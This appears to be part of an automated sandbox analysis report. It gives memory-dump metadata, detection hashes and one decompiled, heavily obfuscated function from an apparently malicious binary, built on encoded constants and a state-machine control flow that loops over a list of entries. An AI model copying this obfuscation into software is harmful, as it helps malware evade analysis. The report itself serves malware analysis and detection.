                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6bf4b
                                                                                                                                                                                                                    0x00a6c01e
                                                                                                                                                                                                                    0x00a6c023
                                                                                                                                                                                                                    0x00a6c028
                                                                                                                                                                                                                    0x00a6c215
                                                                                                                                                                                                                    0x00a6c226
                                                                                                                                                                                                                    0x00a6c226
                                                                                                                                                                                                                    0x00a6c02e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c02e
                                                                                                                                                                                                                    0x00a6bf57
                                                                                                                                                                                                                    0x00a6bfd7
                                                                                                                                                                                                                    0x00a6bfe2
                                                                                                                                                                                                                    0x00a6bfea
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6bfea
                                                                                                                                                                                                                    0x00a6bf5f
                                                                                                                                                                                                                    0x00a6c20d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c212
                                                                                                                                                                                                                    0x00a6bf6b
                                                                                                                                                                                                                    0x00a6bfb6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6bfb6
                                                                                                                                                                                                                    0x00a6bf73
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6bf88
                                                                                                                                                                                                                    0x00a6bf89
                                                                                                                                                                                                                    0x00a6bf97
                                                                                                                                                                                                                    0x00a6bf99
                                                                                                                                                                                                                    0x00a6bfa3
                                                                                                                                                                                                                    0x00a6bfb1
                                                                                                                                                                                                                    0x00a6bfb1
                                                                                                                                                                                                                    0x00a6c03e
                                                                                                                                                                                                                    0x00a6c140
                                                                                                                                                                                                                    0x00a6c14b
                                                                                                                                                                                                                    0x00a6c154
                                                                                                                                                                                                                    0x00a6c16c
                                                                                                                                                                                                                    0x00a6c17b
                                                                                                                                                                                                                    0x00a6c180
                                                                                                                                                                                                                    0x00a6c18a
                                                                                                                                                                                                                    0x00a6c18b
                                                                                                                                                                                                                    0x00a6c197
                                                                                                                                                                                                                    0x00a6c198
                                                                                                                                                                                                                    0x00a6c19d
                                                                                                                                                                                                                    0x00a6c1a0
                                                                                                                                                                                                                    0x00a6c1a3
                                                                                                                                                                                                                    0x00a6c1a7
                                                                                                                                                                                                                    0x00a6c1ba
                                                                                                                                                                                                                    0x00a6c1c9
                                                                                                                                                                                                                    0x00a6c1ca
                                                                                                                                                                                                                    0x00a6c1cb
                                                                                                                                                                                                                    0x00a6c1cf
                                                                                                                                                                                                                    0x00a6c1d0
                                                                                                                                                                                                                    0x00a6c1d5
                                                                                                                                                                                                                    0x00a6c1d8
                                                                                                                                                                                                                    0x00a6c1dd
                                                                                                                                                                                                                    0x00a6c1e1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c1a9
                                                                                                                                                                                                                    0x00a6c1a9
                                                                                                                                                                                                                    0x00a6c1b0
                                                                                                                                                                                                                    0x00a6c1b2
                                                                                                                                                                                                                    0x00a6c1b2
                                                                                                                                                                                                                    0x00a6c1b5
                                                                                                                                                                                                                    0x00a6c1b6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c1a9
                                                                                                                                                                                                                    0x00a6c04a
                                                                                                                                                                                                                    0x00a6c111
                                                                                                                                                                                                                    0x00a6c12a
                                                                                                                                                                                                                    0x00a6c12f
                                                                                                                                                                                                                    0x00a6c132
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c132
                                                                                                                                                                                                                    0x00a6c056
                                                                                                                                                                                                                    0x00a6c0e2
                                                                                                                                                                                                                    0x00a6c0e7
                                                                                                                                                                                                                    0x00a6c0ec
                                                                                                                                                                                                                    0x00a6c103
                                                                                                                                                                                                                    0x00a6c0ee
                                                                                                                                                                                                                    0x00a6c0ee
                                                                                                                                                                                                                    0x00a6c0f9
                                                                                                                                                                                                                    0x00a6c0f9
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c0ec
                                                                                                                                                                                                                    0x00a6c05e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c06b
                                                                                                                                                                                                                    0x00a6c072
                                                                                                                                                                                                                    0x00a6c07b
                                                                                                                                                                                                                    0x00a6c085
                                                                                                                                                                                                                    0x00a6c09f
                                                                                                                                                                                                                    0x00a6c0ba
                                                                                                                                                                                                                    0x00a6c0bf
                                                                                                                                                                                                                    0x00a6c0c4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c0ca
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6c1e8
                                                                                                                                                                                                                    0x00a6c1e8
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $-6$.I$NJK$NQ$Q P?$fRO$B
                                                                                                                                                                                                                    • API String ID: 0-1078445198
                                                                                                                                                                                                                    • Opcode ID: e4e00583b6e1476b701d2c00edeb5f2c664013da088e0ac611a9946924187457
                                                                                                                                                                                                                    • Instruction ID: 708c0083b7580082188029cea2a9da04af5dc16ffe414f357b4c4922861a7aa8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e00583b6e1476b701d2c00edeb5f2c664013da088e0ac611a9946924187457
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A2211715083809BD3A8CF65C98AB9BBBF1FBD4348F10891DE6D986261D7B58949CF03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                    			E00A7988A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				signed int _v308;
                                                                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                                                                    				signed int _v316;
                                                                                                                                                                                                                    				signed int _v320;
                                                                                                                                                                                                                    				signed int _v324;
                                                                                                                                                                                                                    				signed int _v328;
                                                                                                                                                                                                                    				signed int _v332;
                                                                                                                                                                                                                    				signed int _v336;
                                                                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                                                                    				signed int _v344;
                                                                                                                                                                                                                    				signed int _v348;
                                                                                                                                                                                                                    				signed int _v352;
                                                                                                                                                                                                                    				signed int _v356;
                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                    				signed int _v364;
                                                                                                                                                                                                                    				signed int _v368;
                                                                                                                                                                                                                    				signed int _v372;
                                                                                                                                                                                                                    				signed int _v376;
                                                                                                                                                                                                                    				signed int _v380;
                                                                                                                                                                                                                    				signed int _v384;
                                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                                    				signed int _v392;
                                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                    				signed int _v412;
                                                                                                                                                                                                                    				signed int _v416;
                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                    				signed int _v428;
                                                                                                                                                                                                                    				signed int _v432;
                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                    				signed int _v440;
                                                                                                                                                                                                                    				void* _t395;
                                                                                                                                                                                                                    				void* _t424;
                                                                                                                                                                                                                    				void* _t426;
                                                                                                                                                                                                                    				intOrPtr _t429;
                                                                                                                                                                                                                    				void* _t448;
                                                                                                                                                                                                                    				void* _t449;
                                                                                                                                                                                                                    				signed int _t451;
                                                                                                                                                                                                                    				char _t452;
                                                                                                                                                                                                                    				void* _t455;
                                                                                                                                                                                                                    				intOrPtr _t458;
                                                                                                                                                                                                                    				void* _t460;
                                                                                                                                                                                                                    				intOrPtr* _t492;
                                                                                                                                                                                                                    				signed int _t502;
                                                                                                                                                                                                                    				void* _t504;
                                                                                                                                                                                                                    				signed int _t505;
                                                                                                                                                                                                                    				signed int _t506;
                                                                                                                                                                                                                    				signed int _t507;
                                                                                                                                                                                                                    				signed int _t508;
                                                                                                                                                                                                                    				signed int _t509;
                                                                                                                                                                                                                    				signed int _t510;
                                                                                                                                                                                                                    				signed int _t511;
                                                                                                                                                                                                                    				void* _t512;
                                                                                                                                                                                                                    				void* _t514;
                                                                                                                                                                                                                    				void* _t515;
                                                                                                                                                                                                                    				void* _t520;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a24);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t395);
                                                                                                                                                                                                                    				_v412 = 0x3333d5;
                                                                                                                                                                                                                    				_t515 = _t514 + 0x20;
                                                                                                                                                                                                                    				_v412 = _v412 >> 0xe;
                                                                                                                                                                                                                    				_v412 = _v412 << 9;
                                                                                                                                                                                                                    				_v412 = _v412 + 0xffff429a;
                                                                                                                                                                                                                    				_t455 = 0x2c9e556;
                                                                                                                                                                                                                    				_v412 = _v412 ^ 0x00010063;
                                                                                                                                                                                                                    				_t452 = 0;
                                                                                                                                                                                                                    				_v316 = 0x6fa7cc;
                                                                                                                                                                                                                    				_t505 = 0x75;
                                                                                                                                                                                                                    				_v316 = _v316 / _t505;
                                                                                                                                                                                                                    				_v316 = _v316 ^ 0x000ffccd;
                                                                                                                                                                                                                    				_v388 = 0xaba938;
                                                                                                                                                                                                                    				_v388 = _v388 >> 0xd;
                                                                                                                                                                                                                    				_t502 = 0x4f;
                                                                                                                                                                                                                    				_v388 = _v388 / _t502;
                                                                                                                                                                                                                    				_v388 = _v388 + 0x6672;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x0004fe2a;
                                                                                                                                                                                                                    				_v364 = 0x2bb08c;
                                                                                                                                                                                                                    				_v364 = _v364 << 1;
                                                                                                                                                                                                                    				_t506 = 0x74;
                                                                                                                                                                                                                    				_v364 = _v364 / _t506;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0x000c495f;
                                                                                                                                                                                                                    				_v396 = 0xbcb0af;
                                                                                                                                                                                                                    				_v396 = _v396 | 0x871c76a0;
                                                                                                                                                                                                                    				_v396 = _v396 >> 3;
                                                                                                                                                                                                                    				_t507 = 9;
                                                                                                                                                                                                                    				_v396 = _v396 / _t507;
                                                                                                                                                                                                                    				_v396 = _v396 ^ 0x01e4aa3a;
                                                                                                                                                                                                                    				_v436 = 0xc098ff;
                                                                                                                                                                                                                    				_v436 = _v436 + 0xffffee1e;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0x8155b51a;
                                                                                                                                                                                                                    				_v436 = _v436 + 0xffffc837;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0x819259b8;
                                                                                                                                                                                                                    				_v328 = 0xc0ee0c;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0xa2b97f4c;
                                                                                                                                                                                                                    				_v328 = _v328 + 0x7624;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0xa27d5be1;
                                                                                                                                                                                                                    				_v304 = 0xa6b17d;
                                                                                                                                                                                                                    				_v304 = _v304 * 0x39;
                                                                                                                                                                                                                    				_v304 = _v304 ^ 0x25194836;
                                                                                                                                                                                                                    				_v360 = 0xb3ae1;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0xe666c103;
                                                                                                                                                                                                                    				_v360 = _v360 * 0x2b;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0xb476d3af;
                                                                                                                                                                                                                    				_v296 = 0xecec72;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x5d39f6f9;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x5dd2bb97;
                                                                                                                                                                                                                    				_v400 = 0x2a1172;
                                                                                                                                                                                                                    				_v400 = _v400 | 0xaaab8d31;
                                                                                                                                                                                                                    				_v400 = _v400 + 0xffffaacd;
                                                                                                                                                                                                                    				_v400 = _v400 << 5;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0x5568e4de;
                                                                                                                                                                                                                    				_v288 = 0xee8372;
                                                                                                                                                                                                                    				_t508 = 0x5d;
                                                                                                                                                                                                                    				_v288 = _v288 * 0x2d;
                                                                                                                                                                                                                    				_v288 = _v288 ^ 0x29ea11a8;
                                                                                                                                                                                                                    				_v300 = 0x2d45ac;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x3617b112;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x363273ea;
                                                                                                                                                                                                                    				_v352 = 0x9a6758;
                                                                                                                                                                                                                    				_v352 = _v352 + 0x70bc;
                                                                                                                                                                                                                    				_v352 = _v352 * 0x3e;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x258a9e49;
                                                                                                                                                                                                                    				_v420 = 0xf1d0b1;
                                                                                                                                                                                                                    				_v420 = _v420 + 0x4e6e;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0x2fe554d0;
                                                                                                                                                                                                                    				_v420 = _v420 * 0x31;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0x037e4420;
                                                                                                                                                                                                                    				_v348 = 0x139f03;
                                                                                                                                                                                                                    				_v348 = _v348 << 0x10;
                                                                                                                                                                                                                    				_v348 = _v348 | 0x44c50b39;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0xdfccc410;
                                                                                                                                                                                                                    				_v324 = 0x8343f2;
                                                                                                                                                                                                                    				_v324 = _v324 << 0xf;
                                                                                                                                                                                                                    				_v324 = _v324 ^ 0xa1fa4ecb;
                                                                                                                                                                                                                    				_v404 = 0x19bb3e;
                                                                                                                                                                                                                    				_v404 = _v404 / _t502;
                                                                                                                                                                                                                    				_v404 = _v404 + 0xffff563b;
                                                                                                                                                                                                                    				_v404 = _v404 * 0x70;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0xffd650ce;
                                                                                                                                                                                                                    				_v428 = 0x67568a;
                                                                                                                                                                                                                    				_v428 = _v428 >> 0xc;
                                                                                                                                                                                                                    				_t509 = 0x4c;
                                                                                                                                                                                                                    				_v428 = _v428 / _t508;
                                                                                                                                                                                                                    				_v428 = _v428 + 0x3542;
                                                                                                                                                                                                                    				_v428 = _v428 ^ 0x00041e13;
                                                                                                                                                                                                                    				_v372 = 0x2eba2e;
                                                                                                                                                                                                                    				_v372 = _v372 + 0xd781;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x002ef915;
                                                                                                                                                                                                                    				_v384 = 0xc588d9;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0x26712ea5;
                                                                                                                                                                                                                    				_v384 = _v384 + 0xb86c;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0xb969dc6e;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0x9fdd1d22;
                                                                                                                                                                                                                    				_v336 = 0x3ef5ec;
                                                                                                                                                                                                                    				_v336 = _v336 | 0xffbcabf5;
                                                                                                                                                                                                                    				_v336 = _v336 ^ 0xffb439ce;
                                                                                                                                                                                                                    				_v344 = 0xec8635;
                                                                                                                                                                                                                    				_v344 = _v344 << 0xa;
                                                                                                                                                                                                                    				_v344 = _v344 << 2;
                                                                                                                                                                                                                    				_v344 = _v344 ^ 0xc868640b;
                                                                                                                                                                                                                    				_v312 = 0x51370f;
                                                                                                                                                                                                                    				_v312 = _v312 + 0xffff39c9;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x005cff17;
                                                                                                                                                                                                                    				_v320 = 0x21c9b1;
                                                                                                                                                                                                                    				_v320 = _v320 | 0x65a64314;
                                                                                                                                                                                                                    				_v320 = _v320 ^ 0x65a3c187;
                                                                                                                                                                                                                    				_v392 = 0x1e6e64;
                                                                                                                                                                                                                    				_v392 = _v392 + 0xdad8;
                                                                                                                                                                                                                    				_v392 = _v392 * 0x67;
                                                                                                                                                                                                                    				_v392 = _v392 >> 2;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x032ab5b8;
                                                                                                                                                                                                                    				_v432 = 0xc8f53c;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0x0a37c8e1;
                                                                                                                                                                                                                    				_v432 = _v432 / _t509;
                                                                                                                                                                                                                    				_v432 = _v432 >> 0x10;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0x000e744e;
                                                                                                                                                                                                                    				_v440 = 0x495344;
                                                                                                                                                                                                                    				_v440 = _v440 ^ 0xb71e6ff5;
                                                                                                                                                                                                                    				_v440 = _v440 | 0xbee130a6;
                                                                                                                                                                                                                    				_v440 = _v440 << 9;
                                                                                                                                                                                                                    				_v440 = _v440 ^ 0xee74b03b;
                                                                                                                                                                                                                    				_v292 = 0xb72289;
                                                                                                                                                                                                                    				_v292 = _v292 >> 5;
                                                                                                                                                                                                                    				_v292 = _v292 ^ 0x00095c80;
                                                                                                                                                                                                                    				_v332 = 0x8f41fd;
                                                                                                                                                                                                                    				_t510 = 0x1c;
                                                                                                                                                                                                                    				_v332 = _v332 / _t510;
                                                                                                                                                                                                                    				_v332 = _v332 + 0xffff5b2a;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0x00013164;
                                                                                                                                                                                                                    				_v380 = 0x65c68f;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0xf629e96c;
                                                                                                                                                                                                                    				_t511 = 0xe;
                                                                                                                                                                                                                    				_v380 = _v380 * 0x4d;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0x14e4c775;
                                                                                                                                                                                                                    				_v416 = 0x96c8ad;
                                                                                                                                                                                                                    				_v416 = _v416 | 0x46b6a7d1;
                                                                                                                                                                                                                    				_v416 = _v416 << 0x10;
                                                                                                                                                                                                                    				_v416 = _v416 + 0x19d8;
                                                                                                                                                                                                                    				_v416 = _v416 ^ 0xeffcf9e1;
                                                                                                                                                                                                                    				_v356 = 0x622ac7;
                                                                                                                                                                                                                    				_v356 = _v356 + 0xffffa846;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0xdb8af0c6;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0xdbe073b9;
                                                                                                                                                                                                                    				_v424 = 0x40c64;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0xd2df98ce;
                                                                                                                                                                                                                    				_v424 = _v424 >> 9;
                                                                                                                                                                                                                    				_v424 = _v424 | 0x19f4f574;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x19fccf79;
                                                                                                                                                                                                                    				_v308 = 0xd8faa4;
                                                                                                                                                                                                                    				_t512 = _v372;
                                                                                                                                                                                                                    				_v308 = _v308 / _t511;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0x0006ab4d;
                                                                                                                                                                                                                    				_v368 = 0xd2c9a6;
                                                                                                                                                                                                                    				_v368 = _v368 | 0xe41d2bcc;
                                                                                                                                                                                                                    				_v368 = _v368 + 0x26fc;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0xe4eccdf5;
                                                                                                                                                                                                                    				_v408 = 0xc69ab;
                                                                                                                                                                                                                    				_v408 = _v408 + 0x2fb0;
                                                                                                                                                                                                                    				_v408 = _v408 + 0xffff11c3;
                                                                                                                                                                                                                    				_v408 = _v408 << 9;
                                                                                                                                                                                                                    				_v408 = _v408 ^ 0x1750e8ca;
                                                                                                                                                                                                                    				_v376 = 0x26f67f;
                                                                                                                                                                                                                    				_v376 = _v376 + 0xffffc1cc;
                                                                                                                                                                                                                    				_v376 = _v376 * 0x75;
                                                                                                                                                                                                                    				_v376 = _v376 ^ 0x11b8fb88;
                                                                                                                                                                                                                    				_v340 = 0xedbbd8;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0xdff917ee;
                                                                                                                                                                                                                    				_v340 = _v340 + 0x716c;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0xdf1519a2;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t424 = 0xae1e393;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							L2:
                                                                                                                                                                                                                    							_t520 = _t455 - 0x70a9f76;
                                                                                                                                                                                                                    							if(_t520 > 0) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t520 == 0) {
                                                                                                                                                                                                                    								E00A76A6B(_v284, _v432, _v440, _v292, _v332);
                                                                                                                                                                                                                    								E00A76A6B(_t512, _v380, _v416, _v356, _v424);
                                                                                                                                                                                                                    								E00A76A6B(_v276, _v308, _v368, _v408, _v376);
                                                                                                                                                                                                                    								_t515 = _t515 + 0x24;
                                                                                                                                                                                                                    								_t455 = _t504;
                                                                                                                                                                                                                    								L34:
                                                                                                                                                                                                                    								_t424 = 0xae1e393;
                                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t455 == 0x2c9e556) {
                                                                                                                                                                                                                    									_t512 = 0;
                                                                                                                                                                                                                    									E00A73FA6(_v412, 0x100,  &_v260, _v316, _v388, _v364);
                                                                                                                                                                                                                    									_t515 = _t515 + 0x10;
                                                                                                                                                                                                                    									_v276 = 0;
                                                                                                                                                                                                                    									_v272 = 0;
                                                                                                                                                                                                                    									_t455 = 0x4cafa5c;
                                                                                                                                                                                                                    									_v284 = 0;
                                                                                                                                                                                                                    									_v280 = 0;
                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                    										L1:
                                                                                                                                                                                                                    										_t424 = 0xae1e393;
                                                                                                                                                                                                                    										goto L2;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t455 == 0x3c0ced0) {
                                                                                                                                                                                                                    										_t336 =  *((intOrPtr*)( *0xa83b3c + 0xc)) + 0x10; // 0x1078d2a3
                                                                                                                                                                                                                    										_t448 = E00A80E72( &_v260, _v420,  *( *((intOrPtr*)( *0xa83b3c + 0xc)) + 0x38) & 0x0000ffff,  *( *((intOrPtr*)( *0xa83b3c + 0xc)) + 8) & 0x0000ffff, _t512, _v348,  &_v268,  &_v276, _v324, _v404, _v428, _t336);
                                                                                                                                                                                                                    										_t515 = _t515 + 0x28;
                                                                                                                                                                                                                    										if(_t448 == 0) {
                                                                                                                                                                                                                    											_t504 = 0x9f8b55e;
                                                                                                                                                                                                                    											L17:
                                                                                                                                                                                                                    											_t455 = 0x70a9f76;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												L1:
                                                                                                                                                                                                                    												_t424 = 0xae1e393;
                                                                                                                                                                                                                    												goto L2;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t455 = 0x80d170f;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												L1:
                                                                                                                                                                                                                    												_t424 = 0xae1e393;
                                                                                                                                                                                                                    												goto L2;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t455 == 0x4cafa5c) {
                                                                                                                                                                                                                    											_t449 = E00A6B8CA( &_v284, _a16, _v396, _v436, _v328, _v304, _a12);
                                                                                                                                                                                                                    											_t515 = _t515 + 0x14;
                                                                                                                                                                                                                    											if(_t449 != 0) {
                                                                                                                                                                                                                    												_t455 = 0x53f032f;
                                                                                                                                                                                                                    												while(1) {
                                                                                                                                                                                                                    													L1:
                                                                                                                                                                                                                    													_t424 = 0xae1e393;
                                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t455 != 0x53f032f) {
                                                                                                                                                                                                                    												goto L35;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												if(_v280 >= _v340) {
                                                                                                                                                                                                                    													_t451 = E00A7B587( &_v284,  &_v276);
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													_t451 = E00A61914( &_v284);
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    												_t512 = _t451;
                                                                                                                                                                                                                    												_t424 = 0xae1e393;
                                                                                                                                                                                                                    												_t455 =  !=  ? 0xae1e393 : 0x70a9f76;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L38:
                                                                                                                                                                                                                    							return _t452;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t455 == 0x80d170f) {
                                                                                                                                                                                                                    							_t426 = E00A756F8(_v372, _v384, _v336,  &_v268, _a4);
                                                                                                                                                                                                                    							_t515 = _t515 + 0xc;
                                                                                                                                                                                                                    							if(_t426 == 0) {
                                                                                                                                                                                                                    								_t504 = 0x9f8b55e;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t504 = 0x846582;
                                                                                                                                                                                                                    								_t452 = 1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t455 = 0x8969210;
                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t455 == 0x8969210) {
                                                                                                                                                                                                                    								E00A76A6B(_v268, _v344, _v312, _v320, _v392);
                                                                                                                                                                                                                    								_t515 = _t515 + 0xc;
                                                                                                                                                                                                                    								goto L17;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t455 == 0x9f8b55e) {
                                                                                                                                                                                                                    									_t492 =  *0xa83b3c;
                                                                                                                                                                                                                    									_t429 =  *((intOrPtr*)( *((intOrPtr*)(_t492 + 0xc))));
                                                                                                                                                                                                                    									 *((intOrPtr*)(_t492 + 4)) =  *((intOrPtr*)(_t492 + 4)) + 1;
                                                                                                                                                                                                                    									_t458 =  *((intOrPtr*)(_t492 + 4));
                                                                                                                                                                                                                    									 *((intOrPtr*)(_t492 + 0xc)) = _t429;
                                                                                                                                                                                                                    									if(_t429 == 0) {
                                                                                                                                                                                                                    										 *((intOrPtr*)(_t492 + 0xc)) =  *_t492;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t458 >=  *((intOrPtr*)( *0xa83b3c + 8))) {
                                                                                                                                                                                                                    										 *((intOrPtr*)( *0xa83b3c + 4)) = 0;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t455 = 0x2c9e556;
                                                                                                                                                                                                                    										goto L1;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t455 != _t424) {
                                                                                                                                                                                                                    										goto L35;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_push(_t455);
                                                                                                                                                                                                                    										_push(_t455);
                                                                                                                                                                                                                    										_push(1);
                                                                                                                                                                                                                    										_t460 = 0x40;
                                                                                                                                                                                                                    										E00A7CD47(_v288,  &_v260, E00A75103(_t460), _v300, 0xb, _v352);
                                                                                                                                                                                                                    										_t515 = _t515 + 0x1c;
                                                                                                                                                                                                                    										_t455 = 0x3c0ced0;
                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                    											L1:
                                                                                                                                                                                                                    											_t424 = 0xae1e393;
                                                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                                    					} while (_t455 != 0x846582);
                                                                                                                                                                                                                    					goto L38;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}









































































                                                                                                                                                                                                                    0x00a79894
                                                                                                                                                                                                                    0x00a7989b
                                                                                                                                                                                                                    0x00a798a2
                                                                                                                                                                                                                    0x00a798a9
                                                                                                                                                                                                                    0x00a798b0
                                                                                                                                                                                                                    0x00a798b7
                                                                                                                                                                                                                    0x00a798be
                                                                                                                                                                                                                    0x00a798bf
                                                                                                                                                                                                                    0x00a798c0
                                                                                                                                                                                                                    0x00a798c5
                                                                                                                                                                                                                    0x00a798cd
                                                                                                                                                                                                                    0x00a798d0
                                                                                                                                                                                                                    0x00a798d7
                                                                                                                                                                                                                    0x00a798de
                                                                                                                                                                                                                    0x00a798e6
                                                                                                                                                                                                                    0x00a798eb
                                                                                                                                                                                                                    0x00a798f3
                                                                                                                                                                                                                    0x00a798f5
